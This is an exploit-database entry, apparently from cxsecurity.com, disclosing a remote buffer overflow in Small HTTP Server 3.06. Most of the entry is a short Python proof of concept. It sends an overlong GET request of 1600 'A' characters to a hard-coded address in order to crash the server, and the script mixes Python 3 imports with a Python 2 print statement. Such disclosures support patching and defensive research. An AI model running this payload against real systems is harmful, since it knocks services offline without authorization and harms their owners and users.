Small HTTP Server 3.06 Remote Buffer Overflow

2022.04.07
Credit: Yehia Elghaly
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Small HTTP Server Remote Buffer Overflow # Discovered by: Yehia Elghaly # Discovered Date: 2022-04-07 # Vendor Homepage: http://smallsrv.com/ # Software Link : http://smallsrv.com/shttps_mgi.exe # Tested Version: 3.06 # Vulnerability Type: Buffer Overflow Remote # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 # Description: Small HTTP Server 3.06 Long GET Remote Buffer Overflow #!/usr/bin/env python from requests.exceptions import ConnectionError from requests.compat import urljoin, quote_plus import requests as req try: url = "http://192.168.1.99" term = "A" * 1600 evilb = urljoin(url, quote_plus(term)) resp = req.request(method='GET', url=evilb) print(resp.text) except ConnectionError as e: print "Crashed!!"


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top